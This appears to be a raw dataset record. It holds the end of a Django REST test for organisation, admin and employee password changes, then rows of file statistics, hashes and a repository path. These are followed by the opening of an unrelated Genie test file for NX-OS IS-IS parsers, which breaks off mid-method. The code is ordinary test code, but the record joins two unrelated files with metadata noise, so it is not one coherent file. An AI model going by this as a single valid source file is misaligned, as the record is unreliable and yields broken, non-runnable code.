            "company_name": "Company group",
            "email": "company1@user.com",
            "role": "CEO",
            "password1": "testpassword",
            "password2": "testpassword"
        }
        # Valid login credentials for the organisation.
        good_data = {
            "email": "company1@user.com",
            "password": "testpassword",
        }
        # Valid password-change payload.
        good_password_data = {
            "old_password": "testpassword",
            "new_password1": "testpassword1",
            "new_password2": "testpassword1"
        }
        # Invalid payloads, one per expected validation error below.
        password_data_without_old_password = {
            "new_password1": "testpassword",
            "new_password2": "testpassword"
        }
        password_data_with_incorrect_old_password = {
            "old_password": "testpassword1",
            "new_password1": "testpassword",
            "new_password2": "testpassword"
        }
        password_data_without_new_password1 = {
            "old_password": "testpassword",
            "new_password2": "testpassword"
        }
        password_data_without_new_password2 = {
            "old_password": "testpassword",
            "new_password1": "testpassword",
        }
        password_data_not_match = {
            "old_password": "testpassword",
            "new_password1": "testpassword1",
            "new_password2": "testpassword2"
        }
        # Organisation onboards
        response = self.client.post(reverse('rest_register'), data=sign_up_data, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        # Organisation tries changing password without authenticating
        response = self.client.post(reverse('rest_password_change'), data=good_password_data, format='json')
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertEqual(response.data.get('detail'), 'Authentication credentials were not provided.')
        # Organisation logs in
        login_response = self.client.post(reverse('rest_login'), data=good_data, format='json')
        self.assertEqual(login_response.status_code, status.HTTP_200_OK)
        # organisation tries changing password without old password
        self.client.credentials(HTTP_AUTHORIZATION='Bearer {}'.format(login_response.data.get('access_token')))
        response = self.client.post(reverse('rest_password_change'), data=password_data_without_old_password,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data.get('detail'), 'Field old_password is required')
        # organisation tries changing password without new password1
        response = self.client.post(reverse('rest_password_change'), data=password_data_without_new_password1,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data.get('detail'), 'Field new_password1 is required')
        # organisation tries changing password with incorrect old password
        response = self.client.post(reverse('rest_password_change'), data=password_data_with_incorrect_old_password,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data.get('detail'), 'Your old password was entered incorrectly. Please enter it '
                                                      'again.')
        # organisation tries changing password without new password2
        response = self.client.post(reverse('rest_password_change'), data=password_data_without_new_password2,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data.get('detail'), 'Field new_password2 is required')
        # organisation tries changing password without password that don't match
        response = self.client.post(reverse('rest_password_change'), data=password_data_not_match,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data.get('detail'), 'The two password fields didn’t match.')
        # organisation tries changing password with good password data
        response = self.client.post(reverse('rest_password_change'), data=good_password_data,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data.get('detail'), 'New password has been saved.')
        employee_data = {
            "full_name": "Employee Five",
            "email": "employee5@user.com"
        }
        admin_data = {
            "full_name": "Admin One",
            "email": "admin1@user.com"
        }
        # NOTE(review): admin/employee login payloads use "testpassword" —
        # presumably the default password assigned at creation; confirm
        # against the add-employee/add-admin implementation.
        login_admin_data = {
            "email": "admin1@user.com",
            "password": "testpassword"
        }
        login_employee_data = {
            "email": "employee5@user.com",
            "password": "testpassword"
        }
        # organisation add employee
        response = self.client.post(reverse('organisation-add-employee'), data=employee_data,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        # organisation add admin
        response = self.client.post(reverse('organisation-add-admin'), data=admin_data,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.client.credentials()
        # Admin logs in
        admin_login_response = self.client.post(reverse('rest_login'), data=login_admin_data, format='json')
        self.assertEqual(admin_login_response.status_code, status.HTTP_200_OK)
        # admin tries changing password with good password data
        self.client.credentials(HTTP_AUTHORIZATION='Bearer {}'.format(admin_login_response.data.get('access_token')))
        response = self.client.post(reverse('rest_password_change'), data=good_password_data,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data.get('detail'), 'New password has been saved.')
        self.client.credentials()
        # employee logs in
        # NOTE(review): employees authenticate via a distinct endpoint
        # ('rest_login2') — confirm this split is intentional.
        employee_login_response = self.client.post(reverse('rest_login2'), data=login_employee_data, format='json')
        self.assertEqual(employee_login_response.status_code, status.HTTP_200_OK)
        # employee tries changing password with good password data
        self.client.credentials(HTTP_AUTHORIZATION='Bearer {}'.format(employee_login_response.data.get('access_token')))
        response = self.client.post(reverse('rest_password_change'), data=good_password_data,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data.get('detail'), 'New password has been saved.')
        self.client.credentials()
| 44.018908
| 120
| 0.630172
| 2,178
| 20,953
| 5.85124
| 0.080349
| 0.074153
| 0.102872
| 0.063873
| 0.864642
| 0.840003
| 0.793079
| 0.774404
| 0.722065
| 0.695543
| 0
| 0.015058
| 0.26149
| 20,953
| 475
| 121
| 44.111579
| 0.808518
| 0.093829
| 0
| 0.615836
| 0
| 0
| 0.241895
| 0.004964
| 0
| 0
| 0
| 0
| 0.211144
| 1
| 0.017595
| false
| 0.255132
| 0.014663
| 0
| 0.041056
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e0eda045d26743766dea6a3836db56e7c98a7684
| 150,103
|
py
|
Python
|
src/genie/libs/parser/nxos/tests/test_show_isis.py
|
svautour/genieparser
|
7416c9a4b44582be835a0646fb7fad92a5181c7d
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/nxos/tests/test_show_isis.py
|
svautour/genieparser
|
7416c9a4b44582be835a0646fb7fad92a5181c7d
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/nxos/tests/test_show_isis.py
|
svautour/genieparser
|
7416c9a4b44582be835a0646fb7fad92a5181c7d
|
[
"Apache-2.0"
] | null | null | null |
#!/bin/env python
import unittest
from unittest.mock import Mock
from pyats.topology import Device
from genie.metaparser.util.exceptions import (SchemaMissingKeyError,
SchemaEmptyParserError)
from genie.libs.parser.nxos.show_isis import (ShowIsis,
ShowIsisHostname,
ShowIsisAdjacency,
ShowIsisInterface,
ShowIsisSpfLogDetail,
ShowIsisDatabaseDetail,
ShowIsisHostnameDetail)
class TestShowIsis(unittest.TestCase):
    """Unit tests for the ShowIsis parser ('show isis vrf all' on NX-OS)."""

    device = Device(name='aDevice')
    # Simulates a device whose execute() returns no output.
    empty_output = {'execute.return_value': ''}
    # Show full dict diffs on assertion failure.
    maxDiff = None

    # Expected parser result for the golden device output below.
    golden_parsed_output = {
        'instance': {
            'test': {
                'isis_process': 'test',
                'instance_number': 1,
                'uuid': '1090519320',
                'process_id': 1581,
                'vrf': {
                    'default': {
                        'vrf': 'default',
                        'system_id': '3333.3333.3333',
                        'is_type': 'L1-L2',
                        'sap': 412,
                        'queue_handle': 15,
                        'maximum_lsp_mtu': 1492,
                        'stateful_ha': 'enabled',
                        'graceful_restart': {
                            'enable': True,
                            'state': 'Inactive',
                            'last_gr_status': 'none',
                        },
                        'start_mode': 'Complete',
                        'bfd_ipv4': 'globally disabled',
                        'bfd_ipv6': 'globally disabled',
                        'topology_mode': 'Multitopology',
                        'metric_type': {
                            'advertise': ['wide'],
                            'accept': ['narrow', 'wide'],
                        },
                        'area_address': ['49.0001'],
                        'process': 'up and running',
                        'vrf_id': 1,
                        'during_non_graceful_controlled_restart': 'Stale routes',
                        'resolution_of_l3_to_l2': 'Enable',
                        'sr_ipv4': 'not configured and disabled',
                        'sr_ipv6': 'not configured and disabled',
                        'supported_interfaces': ['Loopback0', 'Ethernet1/1.115', 'Ethernet1/2.115'],
                        'topology': {
                            0: {
                                'address_family': {
                                    'ipv4_unicast': {
                                        'number_of_interface': 3,
                                        'distance': 115,
                                    },
                                    'ipv6_unicast': {
                                        'number_of_interface': 0,
                                        'distance': 115,
                                    },
                                },
                            },
                            2: {
                                'address_family': {
                                    'ipv6_unicast': {
                                        'number_of_interface': 3,
                                        'distance': 115,
                                    },
                                },
                            },
                        },
                        'authentication': {
                            'level_1': {
                                'auth_check': 'set',
                            },
                            'level_2': {
                                'auth_check': 'set',
                            },
                        },
                        'l1_next_spf': '00:00:07',
                        'l2_next_spf': '00:00:04',
                    },
                    'VRF1': {
                        'vrf': 'VRF1',
                        'system_id': '3333.3333.3333',
                        'is_type': 'L1-L2',
                        'sap': 412,
                        'queue_handle': 15,
                        'maximum_lsp_mtu': 1492,
                        'stateful_ha': 'enabled',
                        'graceful_restart': {
                            'enable': True,
                            'state': 'Inactive',
                            'last_gr_status': 'none',
                        },
                        'start_mode': 'Complete',
                        'bfd_ipv4': 'globally disabled',
                        'bfd_ipv6': 'globally disabled',
                        'topology_mode': 'Multitopology',
                        'metric_type': {
                            'advertise': ['wide'],
                            'accept': ['narrow', 'wide'],
                        },
                        'area_address': ['49.0001'],
                        'process': 'up and running',
                        'vrf_id': 3,
                        'during_non_graceful_controlled_restart': 'Stale routes',
                        'resolution_of_l3_to_l2': 'Enable',
                        'sr_ipv4': 'not configured and disabled',
                        'sr_ipv6': 'not configured and disabled',
                        'supported_interfaces': ['Loopback300', 'Ethernet1/1.415', 'Ethernet1/2.415'],
                        'topology': {
                            0: {
                                'address_family': {
                                    'ipv4_unicast': {
                                        'number_of_interface': 3,
                                        'distance': 115,
                                    },
                                    'ipv6_unicast': {
                                        'number_of_interface': 0,
                                        'distance': 115,
                                    },
                                },
                            },
                            2: {
                                'address_family': {
                                    'ipv6_unicast': {
                                        'number_of_interface': 3,
                                        'distance': 115,
                                    },
                                },
                            },
                        },
                        'authentication': {
                            'level_1': {
                                'auth_check': 'set',
                            },
                            'level_2': {
                                'auth_check': 'set',
                            },
                        },
                        'l1_next_spf': 'Inactive',
                        'l2_next_spf': 'Inactive',
                    },
                },
            },
        },
    }

    # Raw CLI output fed to the parser through a mocked execute().
    # NOTE(review): leading whitespace inside this CLI capture may have been
    # lost during extraction; Genie parsers can be indentation-sensitive —
    # verify against a real device capture.
    golden_output = {'execute.return_value': '''\
R3_nx# show isis vrf all
ISIS process : test
Instance number : 1
UUID: 1090519320
Process ID 1581
VRF: default
System ID : 3333.3333.3333 IS-Type : L1-L2
SAP : 412 Queue Handle : 15
Maximum LSP MTU: 1492
Stateful HA enabled
Graceful Restart enabled. State: Inactive
Last graceful restart status : none
Start-Mode Complete
BFD IPv4 is globally disabled for ISIS process: test
BFD IPv6 is globally disabled for ISIS process: test
Topology-mode is Multitopology
Metric-style : advertise(wide), accept(narrow, wide)
Area address(es) :
49.0001
Process is up and running
VRF ID: 1
Stale routes during non-graceful controlled restart
Enable resolution of L3->L2 address for ISIS adjacency
SR IPv4 is not configured and disabled for ISIS process: test
SR IPv6 is not configured and disabled for ISIS process: test
Interfaces supported by IS-IS :
loopback0
Ethernet1/1.115
Ethernet1/2.115
Topology : 0
Address family IPv4 unicast :
Number of interface : 3
Distance : 115
Address family IPv6 unicast :
Number of interface : 0
Distance : 115
Topology : 2
Address family IPv6 unicast :
Number of interface : 3
Distance : 115
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
L1 Next SPF: 00:00:07
L2 Next SPF: 00:00:04
ISIS process : test
Instance number : 1
UUID: 1090519320
Process ID 1581
VRF: VRF1
System ID : 3333.3333.3333 IS-Type : L1-L2
SAP : 412 Queue Handle : 15
Maximum LSP MTU: 1492
Stateful HA enabled
Graceful Restart enabled. State: Inactive
Last graceful restart status : none
Start-Mode Complete
BFD IPv4 is globally disabled for ISIS process: test
BFD IPv6 is globally disabled for ISIS process: test
Topology-mode is Multitopology
Metric-style : advertise(wide), accept(narrow, wide)
Area address(es) :
49.0001
Process is up and running
VRF ID: 3
Stale routes during non-graceful controlled restart
Enable resolution of L3->L2 address for ISIS adjacency
SR IPv4 is not configured and disabled for ISIS process: test
SR IPv6 is not configured and disabled for ISIS process: test
Interfaces supported by IS-IS :
loopback300
Ethernet1/1.415
Ethernet1/2.415
Topology : 0
Address family IPv4 unicast :
Number of interface : 3
Distance : 115
Address family IPv6 unicast :
Number of interface : 0
Distance : 115
Topology : 2
Address family IPv6 unicast :
Number of interface : 3
Distance : 115
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
L1 Next SPF: Inactive
L2 Next SPF: Inactive
''']

    def test_empty(self):
        # Empty CLI output must raise SchemaEmptyParserError.
        self.device = Mock(**self.empty_output)
        obj = ShowIsis(device=self.device)
        with self.assertRaises(SchemaEmptyParserError):
            parsed_output = obj.parse()

    def test_golden(self):
        # Golden output must parse into the expected structure.
        self.device = Mock(**self.golden_output)
        obj = ShowIsis(device=self.device)
        parsed_output = obj.parse(vrf='all')
        self.assertEqual(parsed_output,self.golden_parsed_output)
class TestShowIsisInterface(unittest.TestCase):
    """Unit tests for the ShowIsisInterface parser ('show isis interface')."""

    device = Device(name='aDevice')
    # Simulates a device whose execute() returns no output.
    empty_output = {'execute.return_value': ''}
    # Show full dict diffs on assertion failure.
    maxDiff = None

    # Expected result for the 'vrf default' golden output below
    # (loopback0 plus two dot1q sub-interfaces).
    golden_parsed_output = {
        'instance': {
            'test': {
                'vrf': {
                    'default': {
                        'interfaces': {
                            'loopback0': {
                                'name': 'loopback0',
                                'status': 'protocol-up/link-up/admin-up',
                                'ipv4': '10.36.3.3',
                                'ipv4_subnet': '10.36.3.3/32',
                                'ipv6': {
                                    '2001:10:13:115::3/64': {
                                        'state': 'VALID'
                                    },
                                    '2001:10:13:115::33/64': {
                                        'state': 'VALID'
                                    },
                                    '2001:10::33/48': {
                                        'state': 'VALID'
                                    },
                                    '2001:3:3:3:3::/128': {
                                        'state': 'VALID'
                                    },
                                },
                                'ipv6_subnet': '2001:3:3:3::3/128',
                                'ipv6_link_local_address': 'fe80::5c00:80ff:fe02:0',
                                'authentication': {
                                    'level_1': {
                                        'auth_check': 'set',
                                    },
                                    'level_2': {
                                        'auth_check': 'set',
                                    },
                                },
                                'index': '0x0001',
                                'local_circuit_id': '0x01',
                                'circuit_type': 'L1-2',
                                'bfd_ipv4': 'locally disabled',
                                'bfd_ipv6': 'locally disabled',
                                'mtr': 'enabled',
                                'levels': {
                                    '1': {
                                        'metric': '1',
                                    },
                                    '2': {
                                        'metric': '1',
                                    },
                                },
                                'topologies': {
                                    '0': {
                                        'level': {
                                            '1': {
                                                'metric': '1',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'UP',
                                                'ipv4_cfg': 'yes',
                                                'ipv6_mt': 'DN',
                                                'ipv6_cfg': 'yes',
                                            },
                                            '2': {
                                                'metric': '1',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'UP',
                                                'ipv4_cfg': 'yes',
                                                'ipv6_mt': 'DN',
                                                'ipv6_cfg': 'yes',
                                            },
                                        },
                                    },
                                    '2': {
                                        'level': {
                                            '1': {
                                                'metric': '1',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'DN',
                                                'ipv4_cfg': 'no',
                                                'ipv6_mt': 'UP',
                                                'ipv6_cfg': 'yes',
                                            },
                                            '2': {
                                                'metric': '1',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'DN',
                                                'ipv4_cfg': 'no',
                                                'ipv6_mt': 'UP',
                                                'ipv6_cfg': 'yes',
                                            },
                                        },
                                    },
                                },
                            },
                            'Ethernet1/1.115': {
                                'name': 'Ethernet1/1.115',
                                'status': 'protocol-up/link-up/admin-up',
                                'ipv4': '10.23.115.3',
                                'ipv4_subnet': '10.23.115.0/24',
                                'ipv6': {
                                    '2001:10:23:115::3/64': {
                                        'state': 'VALID',
                                    },
                                },
                                'ipv6_subnet': '2001:10:23:115::/64',
                                'ipv6_link_local_address': 'fe80::5c00:80ff:fe02:7',
                                'authentication': {
                                    'level_1': {
                                        'auth_check': 'set',
                                    },
                                    'level_2': {
                                        'auth_check': 'set',
                                    },
                                },
                                'index': '0x0002',
                                'local_circuit_id': '0x01',
                                'circuit_type': 'L1-2',
                                'bfd_ipv4': 'locally disabled',
                                'bfd_ipv6': 'locally disabled',
                                'mtr': 'enabled',
                                'mtu': 1500,
                                'lsp_interval_ms': 33,
                                'levels': {
                                    '1': {
                                        'designated_is': 'R2_xr',
                                        'metric_0': '40',
                                        'metric_2': '40',
                                        'csnp': '10',
                                        'next_csnp': 'Inactive',
                                        'hello': '10',
                                        'multi': '3',
                                        'next_iih': '00:00:04',
                                        'adjs': '1',
                                        'adjs_up': '1',
                                        'pri': '64',
                                        'circuit_id': 'R2_xr.03',
                                        'since': '5d01h',
                                    },
                                    '2': {
                                        'designated_is': 'R2_xr',
                                        'metric_0': '40',
                                        'metric_2': '40',
                                        'csnp': '10',
                                        'next_csnp': '00:00:03',
                                        'hello': '10',
                                        'multi': '3',
                                        'next_iih': '00:00:09',
                                        'adjs': '1',
                                        'adjs_up': '1',
                                        'pri': '64',
                                        'circuit_id': 'R2_xr.03',
                                        'since': '5d01h',
                                    },
                                },
                                'topologies': {
                                    '0': {
                                        'level': {
                                            '1': {
                                                'metric': '40',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'UP',
                                                'ipv4_cfg': 'yes',
                                                'ipv6_mt': 'DN',
                                                'ipv6_cfg': 'yes',
                                            },
                                            '2': {
                                                'metric': '40',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'UP',
                                                'ipv4_cfg': 'yes',
                                                'ipv6_mt': 'DN',
                                                'ipv6_cfg': 'yes',
                                            },
                                        },
                                    },
                                    '2': {
                                        'level': {
                                            '1': {
                                                'metric': '40',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'DN',
                                                'ipv4_cfg': 'no',
                                                'ipv6_mt': 'UP',
                                                'ipv6_cfg': 'yes',
                                            },
                                            '2': {
                                                'metric': '40',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'DN',
                                                'ipv4_cfg': 'no',
                                                'ipv6_mt': 'UP',
                                                'ipv6_cfg': 'yes',
                                            },
                                        },
                                    },
                                },
                            },
                            'Ethernet1/2.115': {
                                'name': 'Ethernet1/2.115',
                                'status': 'protocol-up/link-up/admin-up',
                                'ipv4': '10.13.115.3',
                                'ipv4_subnet': '10.13.115.0/24',
                                'ipv6': {
                                    '2001:10:13:115::3/64': {
                                        'state': 'VALID',
                                    },
                                },
                                'ipv6_subnet': '2001:10:13:115::/64',
                                'ipv6_link_local_address': 'fe80::5c00:80ff:fe02:7',
                                'authentication': {
                                    'level_1': {
                                        'auth_check': 'set',
                                    },
                                    'level_2': {
                                        'auth_check': 'set',
                                    },
                                },
                                'index': '0x0003',
                                'local_circuit_id': '0x02',
                                'circuit_type': 'L1-2',
                                'bfd_ipv4': 'locally disabled',
                                'bfd_ipv6': 'locally disabled',
                                'mtr': 'enabled',
                                'mtu': 1500,
                                'lsp_interval_ms': 33,
                                'levels': {
                                    '1': {
                                        'designated_is': 'R1_xe',
                                        'metric_0': '40',
                                        'metric_2': '40',
                                        'csnp': '10',
                                        'next_csnp': '00:00:10',
                                        'hello': '10',
                                        'multi': '3',
                                        'next_iih': '00:00:03',
                                        'adjs': '1',
                                        'adjs_up': '1',
                                        'pri': '64',
                                        'circuit_id': 'R1_xe.02',
                                        'since': '5d01h',
                                    },
                                    '2': {
                                        'designated_is': 'R1_xe',
                                        'metric_0': '40',
                                        'metric_2': '40',
                                        'csnp': '10',
                                        'next_csnp': '00:00:02',
                                        'hello': '10',
                                        'multi': '3',
                                        'next_iih': '00:00:02',
                                        'adjs': '1',
                                        'adjs_up': '1',
                                        'pri': '64',
                                        'circuit_id': 'R1_xe.02',
                                        'since': '5d01h',
                                    },
                                },
                                'topologies': {
                                    '0': {
                                        'level': {
                                            '1': {
                                                'metric': '40',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'UP',
                                                'ipv4_cfg': 'yes',
                                                'ipv6_mt': 'DN',
                                                'ipv6_cfg': 'yes',
                                            },
                                            '2': {
                                                'metric': '40',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'UP',
                                                'ipv4_cfg': 'yes',
                                                'ipv6_mt': 'DN',
                                                'ipv6_cfg': 'yes',
                                            },
                                        },
                                    },
                                    '2': {
                                        'level': {
                                            '1': {
                                                'metric': '40',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'DN',
                                                'ipv4_cfg': 'no',
                                                'ipv6_mt': 'UP',
                                                'ipv6_cfg': 'yes',
                                            },
                                            '2': {
                                                'metric': '40',
                                                'metric_cfg': 'no',
                                                'fwdng': 'UP',
                                                'ipv4_mt': 'DN',
                                                'ipv4_cfg': 'no',
                                                'ipv6_mt': 'UP',
                                                'ipv6_cfg': 'yes',
                                            },
                                        },
                                    },
                                },
                            },
                        },
                    },
                },
            },
        },
    }

    # Raw CLI output for the 'vrf default' case.
    # NOTE(review): leading whitespace inside this CLI capture may have been
    # lost during extraction — verify against a real device capture.
    golden_output = {'execute.return_value': '''\
R3_nx# show isis interface vrf default
IS-IS process: test VRF: default
loopback0, Interface status: protocol-up/link-up/admin-up
IP address: 10.36.3.3, IP subnet: 10.36.3.3/32
IPv6 address:
2001:10:13:115::3/64 [VALID]
2001:10:13:115::33/64 [VALID]
2001:10::33/48 [VALID]
2001:3:3:3:3::/128 [VALID]
IPv6 subnet: 2001:3:3:3::3/128
IPv6 link-local address: fe80::5c00:80ff:fe02:0
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0001, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface loopback0
BFD IPv6 is locally disabled for Interface loopback0
MTR is enabled
Level Metric
1 1
2 1
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 1 no UP UP yes DN yes
1 2 1 no UP DN no UP yes
2 0 1 no UP UP yes DN yes
2 2 1 no UP DN no UP yes
Ethernet1/1.115, Interface status: protocol-up/link-up/admin-up
IP address: 10.23.115.3, IP subnet: 10.23.115.0/24
IPv6 address:
2001:10:23:115::3/64 [VALID]
IPv6 subnet: 2001:10:23:115::/64
IPv6 link-local address: fe80::5c00:80ff:fe02:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0002, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/1.115
BFD IPv6 is locally disabled for Interface Ethernet1/1.115
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-1 Designated IS: R2_xr
Level-2 Designated IS: R2_xr
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 Inactive 10 3 00:00:04
2 40 40 10 00:00:03 10 3 00:00:09
Level Adjs AdjsUp Pri Circuit ID Since
1 1 1 64 R2_xr.03 5d01h
2 1 1 64 R2_xr.03 5d01h
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
Ethernet1/2.115, Interface status: protocol-up/link-up/admin-up
IP address: 10.13.115.3, IP subnet: 10.13.115.0/24
IPv6 address:
2001:10:13:115::3/64 [VALID]
IPv6 subnet: 2001:10:13:115::/64
IPv6 link-local address: fe80::5c00:80ff:fe02:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0003, Local Circuit ID: 0x02, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/2.115
BFD IPv6 is locally disabled for Interface Ethernet1/2.115
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-1 Designated IS: R1_xe
Level-2 Designated IS: R1_xe
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 00:00:10 10 3 00:00:03
2 40 40 10 00:00:02 10 3 00:00:02
Level Adjs AdjsUp Pri Circuit ID Since
1 1 1 64 R1_xe.02 5d01h
2 1 1 64 R1_xe.02 5d01h
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
''']

    # Expected result for the no-vrf golden output below (single passive
    # interface with no adjacencies).
    golden_parsed_output1 = {
        "instance": {
            "test": {
                "vrf": {
                    "default": {
                        "interfaces": {
                            "Ethernet1/1": {
                                "name": "Ethernet1/1",
                                "status": "protocol-up/link-up/admin-up",
                                "ipv4": "10.5.7.7",
                                "ipv4_subnet": "10.5.7.0/24",
                                "ipv6": {
                                    "2001:db8:10:5:7::7/64": {
                                        "state": "VALID"
                                    }
                                },
                                "ipv6_subnet": "2001:db8:10:5::/64",
                                "ipv6_link_local_address": "fe80::5c00:40ff:fe06:7",
                                "authentication": {
                                    "level_1": {
                                        "auth_check": "set"
                                    },
                                    "level_2": {
                                        "auth_check": "set"
                                    }
                                },
                                "index": "0x0002",
                                "local_circuit_id": "0x01",
                                "circuit_type": "L1-2",
                                "bfd_ipv4": "locally disabled",
                                "bfd_ipv6": "locally disabled",
                                "mtr": "enabled",
                                "passive": "level-1-2",
                                "mtu": 1500,
                                "lsp_interval_ms": 33,
                                "levels": {
                                    "1": {
                                        "metric_0": "40",
                                        "metric_2": "40",
                                        "csnp": "10",
                                        "next_csnp": "Inactive",
                                        "hello": "10",
                                        "multi": "3",
                                        "next_iih": "Inactive",
                                        "adjs": "0",
                                        "adjs_up": "0",
                                        "pri": "64",
                                        "circuit_id": "0000.0000.0000.00",
                                        "since": "2w2d"
                                    },
                                    "2": {
                                        "metric_0": "40",
                                        "metric_2": "40",
                                        "csnp": "10",
                                        "next_csnp": "Inactive",
                                        "hello": "10",
                                        "multi": "3",
                                        "next_iih": "Inactive",
                                        "adjs": "0",
                                        "adjs_up": "0",
                                        "pri": "64",
                                        "circuit_id": "0000.0000.0000.00",
                                        "since": "2w2d"
                                    }
                                },
                                "topologies": {
                                    "0": {
                                        "level": {
                                            "1": {
                                                "metric": "40",
                                                "metric_cfg": "no",
                                                "fwdng": "UP",
                                                "ipv4_mt": "DN",
                                                "ipv4_cfg": "yes",
                                                "ipv6_mt": "DN",
                                                "ipv6_cfg": "yes"
                                            },
                                            "2": {
                                                "metric": "40",
                                                "metric_cfg": "no",
                                                "fwdng": "UP",
                                                "ipv4_mt": "DN",
                                                "ipv4_cfg": "yes",
                                                "ipv6_mt": "DN",
                                                "ipv6_cfg": "yes"
                                            }
                                        }
                                    },
                                    "2": {
                                        "level": {
                                            "1": {
                                                "metric": "40",
                                                "metric_cfg": "no",
                                                "fwdng": "UP",
                                                "ipv4_mt": "DN",
                                                "ipv4_cfg": "no",
                                                "ipv6_mt": "DN",
                                                "ipv6_cfg": "yes"
                                            },
                                            "2": {
                                                "metric": "40",
                                                "metric_cfg": "no",
                                                "fwdng": "UP",
                                                "ipv4_mt": "DN",
                                                "ipv4_cfg": "no",
                                                "ipv6_mt": "DN",
                                                "ipv6_cfg": "yes"
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }

    # Raw CLI output for the no-vrf case (see NOTE above about whitespace).
    golden_output1 = {'execute.return_value': '''\
show isis interface
IS-IS process: test VRF: default
Ethernet1/1, Interface status: protocol-up/link-up/admin-up
IP address: 10.5.7.7, IP subnet: 10.5.7.0/24
IPv6 address:
2001:db8:10:5:7::7/64 [VALID]
IPv6 subnet: 2001:db8:10:5::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0002, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/1
BFD IPv6 is locally disabled for Interface Ethernet1/1
MTR is enabled
Passive level: level-1-2
LSP interval: 33 ms, MTU: 1500
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 Inactive 10 3 Inactive
2 40 40 10 Inactive 10 3 Inactive
Level Adjs AdjsUp Pri Circuit ID Since
1 0 0 64 0000.0000.0000.00 2w2d
2 0 0 64 0000.0000.0000.00 2w2d
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP DN yes DN yes
1 2 40 no UP DN no DN yes
2 0 40 no UP DN yes DN yes
2 2 40 no UP DN no DN yes
''']

    def test_empty(self):
        # Empty CLI output must raise SchemaEmptyParserError.
        self.device = Mock(**self.empty_output)
        obj = ShowIsisInterface(device=self.device)
        with self.assertRaises(SchemaEmptyParserError):
            parsed_output = obj.parse()

    def test_golden(self):
        # 'vrf default' golden output must parse into the expected structure.
        self.device = Mock(**self.golden_output)
        obj = ShowIsisInterface(device=self.device)
        parsed_output = obj.parse(vrf='default')
        self.assertEqual(parsed_output, self.golden_parsed_output)

    def test_golden1(self):
        # No-vrf golden output must parse into the expected structure.
